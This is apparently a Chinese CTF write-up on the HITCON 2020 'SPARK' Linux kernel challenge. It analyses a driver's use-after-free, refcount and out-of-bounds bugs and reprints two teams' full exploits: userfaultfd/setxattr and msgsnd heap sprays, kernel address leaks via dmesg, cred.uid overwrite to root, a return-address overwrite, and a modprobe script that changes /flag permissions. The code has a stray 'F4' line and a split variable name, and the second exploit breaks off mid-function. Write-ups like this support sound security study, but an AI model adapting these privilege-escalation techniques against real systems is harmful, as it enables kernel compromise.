近期题目wp

让我逝逝这些CTF

我的github page blog

SPARK

HITCON CTF 2020

  • 代码里面看到_InterlockedExchangeAdd()函数, 其实是IDA中对lock指令前缀的函数替换.

汇编为lock xadd cs:cur_count, eax

The LOCK prefix can be prepended only to the following instructions and only to those forms of the instructions
where the destination operand is a memory operand: ADD, ADC, AND, BTC, BTR, BTS, CMPXCHG, CMPXCH8B,
CMPXCHG16B, DEC, INC, NEG, NOT, OR, SBB, SUB, XOR, XADD, and XCHG.

xadd是Exchange and Add.

  • 还有mutex的结构体… 大小为32个字节. 包含了啥我就不看了.
    没想到还是要注意一下, 后面用到了mutex中的owner成员, 当锁被使用时可以读取当前进程的current结构体地址, 从而发现cred结构体地址.
  • __fentry__到底是个 | 中文文章
  • char (*names)[3] pointer to an array of 3 chars.

好吧看不懂, linux/spark.h又是什么东西.

艰难的继续看代码, spark.h应该是没给的…

  • fget() 函数的功能是通过文件描述符查找并返回file结构体
    而node结构体应该在struct file中offset为200的位置. 但是我不知道file中哪个成员能存储这种信息.

来自mhackeroni队的wp启发:

ioctl功能:

  • Link (0x4008d900): takes two node descriptors A and B, and a edge weight, and creates the edges A->B and B->A;
  • Info (0x8018d901): provides information about the node;
  • Finalize (0xd902): finalizes the graph rooted in the node, preparing it for queries;
  • Query (0xc010d903): takes two node descriptors and calculates the total weight of the shortest path between them.

在release中: 如果refcount==1(正常情况), 释放traversal中nodes(如果有), 释放edge链表节点, 释放node.

其中的一些细节:

  • open时每个节点的refcount默认为1, 当finalize的时候只有root节点进入traversal()函数时(第一次进入)不增加refcount, 这就意味着除了root, 其他的节点的refcount都会变成2. 而当release root的时候只有root.refcount小于2, 于是只有root的edge+traversal+node本身都被kfree(). 看似正常, 实际上?
  • Info中有一个node->traversal->size的访问链, 而size在traversal中offset为0的位置. 意味着如果能够控制traversal字段那就可以实现任意读. 如何控制traversal?
  • finalize中调用函数traversal进行DFS, 对node的refcount进行+1, 然而在link和query中没有refcount的判断和使用, 而且在release中如果大于等于二则直接退出, 不会调用kfree回收空间. 能否修改refcount?
  • link后相邻节点保存在edge中, 然而当另一端的节点free/release后, edge中的node就构成了一个dangling ptr. 可以用来UAF. 如何控制freed chunk?(uffd+setxattr)
  • query中malloc了一个dis_arr, 使用node及其children的traversal_idx来索引. 能否越界?(看到个数组都要想能不能越界…)
  • 具体为uffd+setxattr控制free后的chunk, 再伪造一个(finalize==1 && traversal_idx>16)的node, 制造出一个OOB(还真能越界). 这个OOB能够修改什么东西?

一般的内核题目都是提权, 直接变成root用户就可以读取/flag文件, 方法大致有任意写原语或者commit+prepare_cred.

可能的思路整理:

  • 还原ko文件类型信息. 看看demo.c中的示例便于理解.
  • 还原成功, 发现可能是kmalloc和kfree为主的内核堆利用. 先制造出一个任意读.
  • getinfo中发现可能的任意读(只要控制了traversal), 这样只要在fd存在的时候node结构体同时也被我们控制就可以做到; 发现mutex的使用, 其中的owner成员可以直通cred; 发现UAF; 发现refcount的问题.
  • 发现traversal_idx是属于node的属性, 而不是某次traversal的. 当query的时候还用到了node的children, 也就是默认了所有的child都属于同一次traversal.
  • 综上所述, 结合uffd+setxattr的方法, 可以在link完一个网再release一个fd之后, 立刻使用这种方法来修改node的内容. 这算是一个基础步骤. 如何继续利用?
  • 把node->traversal_idx修改超过dis_arr的边界, 在query的时候越界修改tmp_node的refcount, 这样在release root之后只有tmp_node+root的会被释放, 而tmp_node的fd反而不会被影响. 只要在这之后马上malloc就可以实现任意读了.
    • 还有个小问题是如何让dis_arr放到node的前面? exp给出了方法: 前后malloc一些node, 中间两百个node中每隔几个释放一个node, 而dis_arr的大小由traversal时遍历到的node数量决定, 设置链接的node数量为16或17(为什么呢?想想吧)时就会刚好占据了原先node的间隙, 满足了越界的位置需求.
    • 然后读啥呢?
  • 可以读取node.lock.owner进而定位到cred, 而因为get_info的v3->size时候mutex_lock(a1->state_lock);已经锁上, 所以可以直接读取.
  • 下一个问题在于node结构体在哪里? 所以要在读取owner之前扫描内存寻找我们设置的特殊值, 有了个任意读的能力确实也可以做到. 扫哪里呢?
  • 主要问题就在于现在一个内核地址都没有, 特别是用来kmalloc的那一块区域. 但是! dmesg是可用的, 可以利用OOB制造一个crash, 然后读取寄存器信息进而获取相应地址. 这可以通过libc库实现, 具体见源码中的第一阶段.
    另外发现这个crash会导致内核出错+进程暂停, 但是如果在一个fork出的child中直接让他exit就没有问题了.
  • 到现在一二阶段和三阶段初始都已完成. 接下来的任务是如何制造任意写将cred中uid改成0(root)?
  • 想到OOB, 理论上可以覆盖一个地址为与首个子节点的连接权值, 但要覆盖cred.uid的话还要知道dis_arr的地址. 又想到一阶段malloc了一个dis_arr且由于crash并没有释放, 如果此时通过release(fd)释放traversal再马上query, 既知道了地址(一阶段时)又得到了一个可用的dis_arr.
  • 接下来就是构造一下所需的结构. 需要额外的一个root加上一些其他节点, 加上fd构成一张网, 把和fd的连接权值赋为0(并且is_finalized!=1)作为要写入的内容. 至于释放和造网两者的顺序想来是没有区别的.
    • 又一个细节是所用到的root和其他节点都是在第一阶段之前分配的. 或许是为了防止混乱.
  • 最后就是修改traversal_idx, 进行一个root的query, 然后就完成了cred.uid的覆盖. 最后的最后直接print /flag.

这是36小时能做完的题目吗??

exp
#define _GNU_SOURCE

#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <sys/mman.h>
#include <syscall.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <sys/xattr.h>
#include <errno.h>
#include <signal.h>
#include <sys/klog.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <semaphore.h> //used to set uffd interface

#define DEV_PATH "/dev/node"
#define SPARK_FINALIZE 0xd902
#define SPARK_LINK 0x4008d900
#define SPARK_QUERY 0xc010d903
#define SPARK_INFO 0x8018D901

struct spark_ioctl_query
{
    int fd1;
    int fd2;
    long long distance;
};

struct spark_info
{
    unsigned long num_children;
    unsigned long traversal_idx;
    unsigned long traversal_size;
};

static unsigned g_create_next_id;

static int create()
{
    int fd = open(DEV_PATH, O_RDONLY);
    assert(fd != -1);
    g_create_next_id++;
    return fd;
}

static void llink(int a, int b, unsigned int weight)
{
    assert(ioctl(a, SPARK_LINK, b | ((unsigned long long)weight << 32)) == 0);
}

static long long query(int a, int b)
{
    struct spark_ioctl_query qry = {
        .fd1 = a,
        .fd2 = b,
    };
    assert(ioctl(a, SPARK_QUERY, &qry) == 0);
    return qry.distance;
}

static void finalize(int a)
{
    assert(ioctl(a, SPARK_FINALIZE) == 0);
}

static void get_info(int a, struct spark_info *info)
{
    assert(ioctl(a, SPARK_INFO, info) == 0);
}

static void release(int a)
{
    assert(close(a) == 0);
}

struct fault_arg
{
    sem_t fault_sem;
    sem_t unblock_sem;
    void *addr;
};

static void *fault_thread(void *arg)
{
    struct fault_arg *param = (struct fault_arg *)arg;

    unsigned char *page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    assert(page != MAP_FAILED);
    page[0] = 0xff; // top byte for traversal addr

    // create a userfaultfd object
    int uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    assert(uffd != -1);

    // enable the userfaultfd object
    struct uffdio_api uffdio_api;
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    assert(ioctl(uffd, UFFDIO_API, &uffdio_api) == 0);

    // n_addr is the start of where you want to catch the pagefault. In our
    // case, we set it to the address of page 2
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (unsigned long)param->addr;
    uffdio_register.range.len = 0x1000;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    assert(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == 0);

    assert(sem_post(&param->fault_sem) == 0);

    struct pollfd pollfd;
    int nready;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    assert(nready != -1);

    struct uffd_msg msg;
    assert(read(uffd, &msg, sizeof(msg)) == sizeof(msg));
    assert(msg.event == UFFD_EVENT_PAGEFAULT);

    assert(sem_post(&param->fault_sem) == 0);
    // wait until reclaim_free is called. but in stage1 it doesn't exist.
    assert(sem_wait(&param->unblock_sem) == 0);

    struct uffdio_copy uffdio_copy;
    uffdio_copy.src = (unsigned long)page;
    uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~0xfffUL;
    uffdio_copy.len = 0x1000;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    assert(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == 0);

    close(uffd);
    munmap(page, 0x1000);

    return NULL;
}

struct setxattr_arg
{
    const void *buf;
    size_t size;
};

static void *setxattr_thread(void *arg)
{
    struct setxattr_arg *param = (struct setxattr_arg *)arg;
    assert(setxattr(".", "nonexistent", param->buf, param->size, XATTR_REPLACE) == -1);
    return NULL;
}

struct reclaim_ctx
{
    struct fault_arg fault_arg;
    struct setxattr_arg setxattr_arg;
    pthread_t setxattr_handle;
};

static void reclaim_alloc_raw(struct reclaim_ctx *ctx, char *buf)
{
    char *mem = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    assert(mem != MAP_FAILED);

    ctx->fault_arg.addr = mem + 0x1000;
    assert(sem_init(&ctx->fault_arg.fault_sem, 0, 0) == 0);
    assert(sem_init(&ctx->fault_arg.unblock_sem, 0, 0) == 0);

    pthread_t handle;
    assert(pthread_create(&handle, NULL, fault_thread, &ctx->fault_arg) == 0);
    assert(sem_wait(&ctx->fault_arg.fault_sem) == 0);

    char *node = mem + 0x1000 - 0x7e;
    // memcpy could cross boundaries
    for (int i = 0; i < 0x7e; i++)
        node[i] = buf[i];

    ctx->setxattr_arg.buf = node;
    ctx->setxattr_arg.size = 0x7f; // avoid copy_from_user 16b optimization
    assert(pthread_create(&ctx->setxattr_handle, NULL, setxattr_thread, &ctx->setxattr_arg) == 0);

    assert(sem_wait(&ctx->fault_arg.fault_sem) == 0);
}

static void reclaim_alloc(struct reclaim_ctx *ctx, unsigned int is_finalized,
                          unsigned long num_children, unsigned long traversal_idx,
                          unsigned long traversal)
{
    char buf[0x80];
    memset(buf, 0, sizeof(buf));
    *(unsigned int *)(buf + 0x8) = 1;               // refcount
    *(unsigned int *)(buf + 0x30) = is_finalized;   // is_finalized
    *(unsigned long *)(buf + 0x58) = num_children;  // num_children
    *(unsigned long *)(buf + 0x70) = traversal_idx; // traversal_idx
    *(unsigned long *)(buf + 0x78) = traversal;     // traversal

    reclaim_alloc_raw(ctx, buf);
}

static void reclaim_free(struct reclaim_ctx *ctx)
{
    assert(sem_post(&ctx->fault_arg.unblock_sem) == 0);
    assert(pthread_join(ctx->setxattr_handle, NULL) == 0);
}

static void stage1_leak_dmesg(unsigned long *dist_addrp, unsigned long *edges_addrp)
{
    int i, sz;
    char *buf;

    //*query the size of the kernel ring buffer
    sz = klogctl(10, NULL, 0);
    assert(sz != -1);

    buf = malloc(sz);
    //*read all message from the kernel buffer into @buf.
    assert(klogctl(3, buf, sz) != -1);

    unsigned long dist_addr = 0, edges_addr = 0;
    for (i = 0; i < sz && (!dist_addr || !edges_addr); i++)
    {
        //*rax stores dis_arr
        if (!dist_addr && !strncmp(buf + i, "RAX: ", 5))
        {
            if (sscanf(buf + i + 5, "%lx", &dist_addr) != 1)
                dist_addr = 0;
        }
        //*r9 stores the edge
        if (!edges_addr && !strncmp(buf + i, "R09: ", 5))
        {
            if (sscanf(buf + i + 5, "%lx", &edges_addr) != 1)
                edges_addr = 0;
        }
    }
    assert(dist_addr && edges_addr);

    free(buf);

    *dist_addrp = dist_addr;
    *edges_addrp = edges_addr;
}

// resulting size should be in a rarely used cache
// this is supposed to be arbitrary but if you change it you'll mess up stage 3
#define S1_DIST_NUM_NODES 12

static void stage1(unsigned long *dist_addrp, unsigned long *node_addrp, int *node_fdp)
{
    fprintf(stderr, "[S1] Creating graph\n");
    int fds[S1_DIST_NUM_NODES];
    for (int i = 0; i < S1_DIST_NUM_NODES; i++)
        fds[i] = create();
    for (int i = 1; i < S1_DIST_NUM_NODES; i++)
        llink(fds[0], fds[i], 1);

    fprintf(stderr, "[S1] Freeing node\n");
    release(fds[S1_DIST_NUM_NODES - 1]);

    //*the crashed process will stop execute, so create a new thread here.
    pid_t pid = fork();
    assert(pid != -1);

    if (pid == 0)
    { //*chlid process
        fprintf(stderr, "[S1] Reclaiming node\n");
        struct reclaim_ctx ctx;
        //*finalized the last node, avoid the revise of the next finalize
        reclaim_alloc(&ctx, 1, 0, 0x4141000000000000UL, 0);

        fprintf(stderr, "[S1] Finalizing root\n");
        finalize(fds[0]);

        fprintf(stderr, "[S1] Performing crash query by UAF\n");
        query(fds[0], fds[1]);

        // Will never get here
        exit(1);
    }

    usleep(250 * 1000);

    fprintf(stderr, "[S1] Leaking from dmesg\n");
    unsigned long dist_addr, edges_addr;
    stage1_leak_dmesg(&dist_addr, &edges_addr);
    unsigned long node_addr = edges_addr - 0x60;
    fprintf(stderr, "[S1] Dist @ 0x%lx\n", dist_addr);
    fprintf(stderr, "[S1] Node @ 0x%lx\n", node_addr);

    *dist_addrp = dist_addr;
    *node_addrp = node_addr;
    *node_fdp = fds[0];
#undef STAGE1_NUM_NODES
}

static void stage2_spray(int *fd, int before, int n, int skip, int after)
{
    for (int i = 0; i < before; i++)
        create();
    for (int i = 0; i < n; i++)
        fd[i] = create();
    for (int i = 0; i < n; i += skip)
    {
        release(fd[i]);
        fd[i] = -1;
    }
    for (int i = 0; i < after; i++)
        create();
}

static void stage2(struct reclaim_ctx *victim_ctx, int *victim_fdp)
{
//*errrrrrr, dist array size will be 8b less than STAGE2_NUM_NODES*8
#define STAGE2_NUM_NODES 17 // dist array size == 0x80 == sizeof node
    fprintf(stderr, "[S2] Creating graph\n");
    int fds[STAGE2_NUM_NODES];
    for (int i = 0; i < STAGE2_NUM_NODES; i++)
        fds[i] = create();
    for (int i = 1; i < STAGE2_NUM_NODES; i++)
        llink(fds[0], fds[i], 1); // 1 will be written at traversal_idx

    fprintf(stderr, "[S2] Freeing node\n");
    release(fds[STAGE2_NUM_NODES - 1]);

    fprintf(stderr, "[S2] Reclaiming node\n");
    //*the idx is 17
    reclaim_alloc(victim_ctx, 1, 0, (0x80 + 0x8) / 8, 0); // target: sprayed refcount

    fprintf(stderr, "[S2] Finalizing root\n");
    //*now fds[0] have children in different traversals. the last and the others.
    finalize(fds[0]);

    fprintf(stderr, "[S2] Creating predecessor\n");
    int spray_incref_fd = create();

#define STAGE2_SPRAY_NUM 200
    fprintf(stderr, "[S2] Spraying nodes\n");
    int spray_fd[STAGE2_SPRAY_NUM];
    stage2_spray(spray_fd, 30, STAGE2_SPRAY_NUM, 4, 30);

    fprintf(stderr, "[S2] Incrementing sprayed refcounts\n");
    for (int i = 0; i < STAGE2_SPRAY_NUM; i++)
    {
        if (spray_fd[i] != -1)
            llink(spray_incref_fd, spray_fd[i], 0);
    }
    //*above ops create gaps in size of struct_node for dis_arr
    //*next line there is nothing special
    finalize(spray_incref_fd);

    fprintf(stderr, "[S2] Corrupting refcount\n");
    //*use the OOB to corrupt the dis_arr's adjacent node struct.
    query(fds[0], fds[1]);

    fprintf(stderr, "[S2] Freeing victim node\n");
    //*release the root, but only the node whose refcount has been modified will be freed
    //*and all fds except for root retain the same as before.
    release(spray_incref_fd);

    fprintf(stderr, "[S2] Reclaiming victim node\n");
    reclaim_free(victim_ctx); // unblock fault
                              // ephemeral alloc to put two 0xff at the end for traversal top bytes
                              //*these two bytes are in next uffd page
    unsigned char buf[0x80];
    buf[sizeof(buf) - 1] = 0xff;
    buf[sizeof(buf) - 2] = 0xff;
    //*now there are serveral gaps in size of node_t, which one will be chosed?
    //*good luck. at least the following two lines will use the same chunk.
    assert(setxattr(".", "nonexistent", buf, sizeof(buf), XATTR_REPLACE) == -1);
    reclaim_alloc(victim_ctx, 0, 1337, 0, 0);

    fprintf(stderr, "[S2] Searching for victim node(fd)\n");
    int victim_fd = -1;
    for (int i = 0; i < STAGE2_SPRAY_NUM; i++)
    {
        if (spray_fd[i] != -1)
        {
            struct spark_info info = {
                .num_children = 0,
            };
            get_info(spray_fd[i], &info);
            if (info.num_children == 1337)
            {
                victim_fd = spray_fd[i];
                break;
            }
        }
    }
    //*indeed, this totally depends on luck...
    assert(victim_fd != -1);

    fprintf(stderr, "[S2] Victim fd = %d\n", victim_fd);
    *victim_fdp = victim_fd;
#undef STAGE2_SPRAY_NUM
#undef STAGE2_NUM_NODES
}

#define STAGE3_READ_NUM_CHILDREN 0x4142133703030303

static unsigned long stage3_read(struct reclaim_ctx *ctx, int fd, unsigned long addr)
{
    reclaim_free(ctx);
    // during read, we keep a special num_children so we can find ourselves
    reclaim_alloc(ctx, 1, STAGE3_READ_NUM_CHILDREN, 0, addr);

    struct spark_info info;
    get_info(fd, &info);
    return info.traversal_size;
}

static void stage3(struct reclaim_ctx *ctx, int fd, int *scratch_fds, unsigned long s1_dist_addr,
                   unsigned long s1_node_addr)
{
    char buf[0x80];

    fprintf(stderr, "[S3] Finding victim node\n");
    //*.......nb
    unsigned long victim_addr = 0;
    for (int i = 6000; i < 10000; i++)
    {
        //*why the node is sizeof(node_t) aligned???
        //*is there something strange in kernel slab memory manager?
        //*7000~7800
        unsigned long addr = s1_node_addr + i * 0x80;
        unsigned long value = stage3_read(ctx, fd, addr + 0x58);
        if (value == STAGE3_READ_NUM_CHILDREN)
        {
            victim_addr = addr;
            break;
        }
    }
    assert(victim_addr);
    fprintf(stderr, "[S3] Victim @ 0x%lx\n", victim_addr);

    fprintf(stderr, "[S3] Findings creds\n");
    unsigned long current = stage3_read(ctx, fd, victim_addr + 0x10); // state_lock.owner
    fprintf(stderr, "[S3] current = 0x%lx\n", current);
    unsigned long cred_addr = stage3_read(ctx, fd, current + 0xa90);
    fprintf(stderr, "[S3] cred @ 0x%lx\n", cred_addr);

    fprintf(stderr, "[S3] Crafting linkable node\n");
    memset(buf, 0, sizeof(buf));
    *(unsigned long *)(buf + 0x0) = 100000;              // id
    *(unsigned int *)(buf + 0x8) = 1;                    // refcount
    *(unsigned int *)(buf + 0x30) = 0;                   // is_finalized
    *(unsigned long *)(buf + 0x60) = victim_addr + 0x60; // edges.next (empty list)
    *(unsigned long *)(buf + 0x68) = victim_addr + 0x68; // edges.prev (empty list)
    reclaim_free(ctx);
    reclaim_alloc_raw(ctx, buf);

    fprintf(stderr, "[S3] Building graph\n");
    int graph_fds[S1_DIST_NUM_NODES];
    for (int i = 0; i < S1_DIST_NUM_NODES - 1; i++)
        graph_fds[i] = scratch_fds[i]; // avoid allocations, they mess stuff up
    for (int i = 1; i < S1_DIST_NUM_NODES - 1; i++)
        llink(graph_fds[0], graph_fds[i], 0);
    llink(graph_fds[0], fd, 0); // weight = write primitive value (zero for root creds)
    finalize(graph_fds[0]);

    fprintf(stderr, "[S3] Freeing stage1 dist array\n");
    //*due to stage 1 child process crashed, we have no choice but this method.
    memset(buf, 0, sizeof(buf));
    *(unsigned int *)(buf + 0x8) = 1;                     // refcount
    *(unsigned int *)(buf + 0x30) = 1;                    // is_finalized
                                                          // fake node_array overlaps unused nb_lock
    *(unsigned long *)(buf + 0x38 + 0x0) = 0;             // fake node_array.size
    *(unsigned long *)(buf + 0x38 + 0x10) = s1_dist_addr; // fake node_array.nodes (will be freed)
    *(unsigned long *)(buf + 0x60) = victim_addr + 0x60;  // edges.next (empty list)
    *(unsigned long *)(buf + 0x78) = victim_addr + 0x38;  // traversal = fake node_array
    reclaim_free(ctx);
    reclaim_alloc_raw(ctx, buf);
    release(fd);   // free s1_dist_addr
    fd = create(); // immediately reclaim victim node to restore stable state

    fprintf(stderr, "[S3] Overwriting cred\n");
    unsigned long write_addr = cred_addr + 8 * 3;
    unsigned long idx = (write_addr - s1_dist_addr) / 8;
    reclaim_free(ctx);
    reclaim_alloc(ctx, 1, 0, idx, 0);
    query(graph_fds[0], graph_fds[1]);  //kmalloc the orignal s1_dist_addr
}

static void print_flag()
{
    int fd = open("/flag", O_RDONLY);
    assert(fd != -1);

    char buf[100];
    memset(buf, 0, sizeof(buf));
    assert(read(fd, buf, sizeof(buf) - 1) != -1);
    close(fd);

    fprintf(stderr, "!!! FLAG: %s\n", buf);
}

int main(void)
{
    //*what are these?
    int scratch_fds[12];
    for (int i = 0; i < 12; i++)
        scratch_fds[i] = create();

    // Leak a distance array (still malloc'ed) and the address of a live node
    unsigned long s1_dist_addr, s1_node_addr;
    int s1_node_fd;
    stage1(&s1_dist_addr, &s1_nod e_addr, &s1_node_fd);

    // Get a fd that can be freed and reclaimed repeatedly
    struct reclaim_ctx victim_ctx;
    int victim_fd;
    stage2(&victim_ctx, &victim_fd);

    // Get somewhat rootish privileges
    stage3(&victim_ctx, victim_fd, scratch_fds, s1_dist_addr, s1_node_addr);
F4
    print_flag();
}

来自perfectblue的exp:

mutex的结构:

struct mutex {
  uint64_t owner;
  uint64_t wait_lock;
  void* prev;
  void* next;
};

改进细节:

  • 第一次crash可以使用refcount_warn_saturate. 这样只要令refcount等于0, 就会触发finalize中的警告, 从而导致crash的产生, 不过exp中简单的使用了sleep等待线程, 以及手动输入dmesg信息. 上面一个战队的exp中解析内核日志的代码可以拿来重复利用, 免得在调试的时候浪费时间.
    好吧这很有问题, 进入了这个函数之后寄存器值都变了. 不好评价.
  • 好了, 看不懂那个leak出来的是个啥, 什么是kmalloc_32/128???也没个wp解释一下.
exp: 略

来自balsn战队:

仅仅两百多行, 这么简洁.

  • crash用到了refcount_warn_saturate. 原因是finalize之前release会使refcount变0.
  • 用到了msgsnd, 也就是kmalloc有最大和最小长度限制, 而且有一个0x30(48)字节的头部.
  • msgsnd只能控制后0x50的区域. 也就是最后四行
struct node_t
{
  uint64_t id;
  uint64_t refcount;
  char state_lock[32];
  uint64_t is_finalized;
  char nb_lock[32];
  //following is under control
  uint64_t num_children;
  struct list_head_t edges;
  uint64_t traversal_idx;
  struct node_list_t *traversal;
};
  • 不知道怎么得出的rbx中存储kernel_heap, 不过可能是从崩溃信息中对比和真实heap最接近的一个寄存器地址.
  • 用了一个很巧妙的方法来获取dis_arr的地址, 在用户区建立一个很大的缓冲区, 猜测在已有的heap地址附近, 让idx偏移越界溢出从内核地址绕回到缓冲区中, 检查哪个地址上的数据被修改就可推算真实的dis_arr. 再根据dis_arr来算出和modprobe的地址. 进而修改到shellcode函数中.
    可行的原因为未开smep+smap.

遇到的问题:

  • 读取内核错误信息莫名出错, 换成了klogctl才成功. 修改用参数来crash的神奇操作. 修改kernel_ret为query的返回地址在栈上的存储位置.

modprobe:

重点在于造一个头部以未知的程序. 执行后内核自会使用/tmp/y处理, 不过是修改了/flag的权限

#!/bin/sh                                           
echo -ne '\xffyyy' > fake
echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/y
chmod +x fake
chmod +x /tmp/y
/balsn
/balsn
/balsn
cat /flag
exp:
// musl-gcc exp.c -o exp -static -masm=intel
//
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdint.h>
#include <syscall.h>
#include <string.h>
#include <pthread.h>
#include <sys/mman.h>
#include <signal.h>
#include <assert.h>
#include <stdint.h>

#define SPARK_LINK 0x4008D900
#define SPARK_GET_INFO 0x8018D901
#define SPARK_FINALIZE 0xD902
#define SPARK_QUERY 0xC010D903

#define PAUSE scanf("%*c");

struct spark_ioctl_query
{
    int fd1;
    int fd2;
    size_t distance;
};

struct Link_Header
{
    struct Link_Header *fd, *bk;
};

struct Node
{
    size_t id;
    size_t refcount;
    size_t state_lock[4];
    size_t finalized;
    size_t nb_lock[4];
    size_t num_edges;
    struct Link_Header link_header;
    size_t index;
    size_t tra;
};

struct Edge
{
    struct Link_Header link_header;
    struct Node *dst_node;
    size_t weight;
};

static int fd[100];

static void link(int a, int b, unsigned int weight)
{
    // printf("Creating link between '%d' and '%d' with weight %u\n", a, b, weight);
    assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight << 32)) == 0);
}

static void query(int i, int a, int b)
{
    struct spark_ioctl_query qry = {
        .fd1 = fd[a],
        .fd2 = fd[b],
    };
    int ret = ioctl(fd[i], SPARK_QUERY, &qry);
    // printf( "[query] ret = %d\n" , ret );
    // printf("The length of shortest path between '%d' and '%d' is %lld\n", a, b, qry.distance);
}

void get_info(int a)
{
    size_t buf[3];
    memset(buf, 0xcc, sizeof(buf));
    assert(ioctl(fd[a], SPARK_GET_INFO, buf) == 0);
    printf("[get info %d] ", a);
    for (int i = 0; i < 3; ++i)
    {
        printf("%p ", buf[i]);
    }
    puts("");
}

void spark_open(int i)
{
    fd[i] = open("/dev/node", O_RDWR);
    assert(fd[i] >= 0);
}

void spark_close(int i)
{
    close(fd[i]);
}

void spark_finalize(int i)
{
    ioctl(fd[i], SPARK_FINALIZE);
}

// for kmalloc
#include <sys/msg.h>
#include <sys/ipc.h>

struct MsgBuf
{
    long mtype;
    char mtext[0x10000]; // 65536
} msgbuf;

int msg_open()
{
    int qid;
    if ((qid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }
    return qid;
}

void msg_send(int qid, char *data, size_t size)
{
    msgbuf.mtype = 1;
    memcpy(msgbuf.mtext, &data[0x30], size - 0x30);
    if (msgsnd(qid, &msgbuf, size - 0x30, 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

void msg_free(int qid, size_t size)
{
    msgbuf.mtype = 1;
    if (msgrcv(qid, &msgbuf, size - 0x30, 1, 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

void arb_write(int qid, size_t off)
{
    struct Node data = {
        .index = off,
    };

    // change content
    msg_free(qid, 0x80);
    msg_send(qid, &data, 0x80);

    query(20, 20, 22);
}

void crash()
{
    puts("[+] Crashing...");
    spark_open(0);
    spark_open(1);
    link(0, 1, 0);
    spark_close(1);
    spark_finalize(0);
}

size_t kernel_stack, kernel_heap;

void leak()
{
    int pid = fork();
    if (pid == 0)
    {
        crash();
        exit(1);
    }
    sleep(0.5);
    printf("[+] get info from dmesg\n");

    int i, sz;
    char *buf;
    //*query the size of the kernel ring buffer
    sz = klogctl(10, NULL, 0);
    assert(sz != -1);
    buf = malloc(sz);
    //*read all message from the kernel buffer into @buf.
    assert(klogctl(3, buf, sz) != -1);
    // size_t kernel_heap, kernel_stack;
    for (i = 0; i < sz && (!kernel_stack || !kernel_heap); i++)
    {
        //*rax stores dis_arr
        if (!kernel_stack && !strncmp(buf + i, "RSP: 0018:", 5))
        {
            if (sscanf(buf + i + 10, "%lx", &kernel_stack) != 1)
                kernel_stack = 0;
        }
        //*r9 stores the edge
        if (!kernel_heap && !strncmp(buf + i, "RBX: ", 5))
        {
            if (sscanf(buf + i + 5, "%lx", &kernel_heap) != 1)
                kernel_heap = 0;
        }
    }
    assert(kernel_stack && kernel_heap);
    free(buf);

    printf("[+] Leak kernel stack addr: %p\n", kernel_stack);
    printf("[+] Leak kernel heap addr: %p\n", kernel_heap);
}

/*
0xffff98d5cdd2be80:	0xffffffffffffffff	0x000000000088770f
0xffff98d5cdd2be90:	0x000000000088770e	0x000000000088770d
0xffff98d5cdd2bea0:	0x000000000088770c	0x000000000088770b
0xffff98d5cdd2beb0:	0x000000000088770a	0x0000000000887709
0xffff98d5cdd2bec0:	0x0093037d5f064f38	0x0000000000887707
0xffff98d5cdd2bed0:	0x0000000000887706	0x0000000000887705
0xffff98d5cdd2bee0:	0x0000000000887704	0x0000000000887703
0xffff98d5cdd2bef0:	0x0000000000887702	0x0000000000887701
0xffff98d5cdd2bf00:	0x0000000000000000	0x0000000000000000
*/

void shellcode();

#define target_area_size 0x1000000
size_t cushion[target_area_size];

int main(int argc, char **argv)
{
    // size_t kernel_heap = strtoull(argv[1],0,16);    // input RBX by hand
    leak(); // change to better way for leak

    struct Node node = {
        .id = 0xffffffffffff,
        .refcount = 0,
        .state_lock = {0},
        .finalized = 1,
        .nb_lock = {0},
        .num_edges = 1,
        .link_header.fd = 0x1111,
        .link_header.bk = 0x2222,
        .index = 0x6666,
        .tra = 0,
    };

    size_t *fake_node = &node;

    for (int i = 0; i < 0x10; i++)
        spark_open(i);
    for (int i = 1; i < 0x10; ++i)
        link(0, 0x10 - i, fake_node[0x10 - i]);

    spark_finalize(0);

    spark_open(20);
    spark_open(21);
    spark_open(22);
    link(20, 22, 0);
    // link( 20 , 21 , 0x7777777 );      // rip
    link(20, 21, shellcode + 4);
    spark_close(21); // free node 21

    query(0, 0, 1); // overwrite node 21

    spark_finalize(20);

    // get UAF node 21
    int qid = msg_open();
    msg_send(qid, &fake_node, 0x80);

    size_t dis_heap_addr = kernel_heap;
    dis_heap_addr &= ~(target_area_size - 1);
    dis_heap_addr -= target_area_size * 2;

    printf("[+] init heap address of distanse array: %p\n", dis_heap_addr);
    printf("[+] cushion addr: %p\n", cushion);
    puts("[+] Searching ...");

    for (int i = 0; i < target_area_size; ++i)
        cushion[i] = 0x7ffffffffffffff;

    // write to userland
    size_t addr = ((size_t)cushion - dis_heap_addr);
    fprintf(stderr, "[+] travsersal addr: %p\n", addr);
    arb_write(qid, addr / 8);

    // find offset
    for (int i = 0; i < target_area_size; ++i)
    {
        if (cushion[i] != 0x7ffffffffffffff)
        {
            printf("[+] Found at idx:%p content:%p addr:%p\n", i, cushion[i], &cushion[i]);
            dis_heap_addr += i * 8;
            printf("[+] dis_heap_addr: %p\n", dis_heap_addr);
            break;
        }
    }

    // overwrite the ret address to shellcode().
    size_t kernel_ret_addr = kernel_stack + 0xa0;
    arb_write(qid, (kernel_ret_addr - dis_heap_addr) / 8);

